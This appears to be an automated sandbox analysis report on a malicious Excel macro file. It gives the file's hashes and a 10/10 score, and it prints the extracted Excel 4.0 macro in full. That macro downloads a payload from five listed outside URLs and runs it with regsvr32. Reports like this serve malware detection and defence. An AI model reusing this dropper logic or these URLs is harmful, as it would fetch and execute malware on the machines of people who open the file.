Overview

overview

10

Static

static

10

af3a4e7454...f.xlsm

windows7-x64

10

af3a4e7454...f.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    af3a4e74541baa2d8367812bc5070ddeaee770024b61a8180124aec05aeb07ef

  • Size

    91KB

  • Sample

    241120-yyplwasmf1

  • MD5

    c6d061442f190c492b5a264592e23276

  • SHA1

    06b9815395a8818120bdce01858b0755f44b3c5c

  • SHA256

    af3a4e74541baa2d8367812bc5070ddeaee770024b61a8180124aec05aeb07ef

  • SHA512

    e29869d6e0f8352f3ce6903b2b7c9a8651d1b0725aee153f4624d27d4a0094c50cd6019a940dd1a2b9171815669ba93b6c9ab26c8e02e5be2fd857c0958df168

  • SSDEEP

    1536:NdNlX2L2nyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xX0bIS:Nd32KyVEoBo6hKb4llGsQjbxXS

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/

https://dev.subs2me.com/wp-includes/EMa/

https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/

https://yanapiri.com/upeatv/9IZP9RfbH338pFPI/

https://gurmitjaswal.ca/frer-hate/LW37erwSAhgU/
Attributes
  • formulas

    =FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/","..\dw1.ocx",0,0) =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dev.subs2me.com/wp-includes/EMa/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://yanapiri.com/upeatv/9IZP9RfbH338pFPI/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://gurmitjaswal.ca/frer-hate/LW37erwSAhgU/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dw1.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/
xlm40.dropper

https://dev.subs2me.com/wp-includes/EMa/
xlm40.dropper

https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/

Targets

    • Target

      af3a4e74541baa2d8367812bc5070ddeaee770024b61a8180124aec05aeb07ef

    • Size

      91KB

    • MD5

      c6d061442f190c492b5a264592e23276

    • SHA1

      06b9815395a8818120bdce01858b0755f44b3c5c

    • SHA256

      af3a4e74541baa2d8367812bc5070ddeaee770024b61a8180124aec05aeb07ef

    • SHA512

      e29869d6e0f8352f3ce6903b2b7c9a8651d1b0725aee153f4624d27d4a0094c50cd6019a940dd1a2b9171815669ba93b6c9ab26c8e02e5be2fd857c0958df168

    • SSDEEP

      1536:NdNlX2L2nyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xX0bIS:Nd32KyVEoBo6hKb4llGsQjbxXS

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks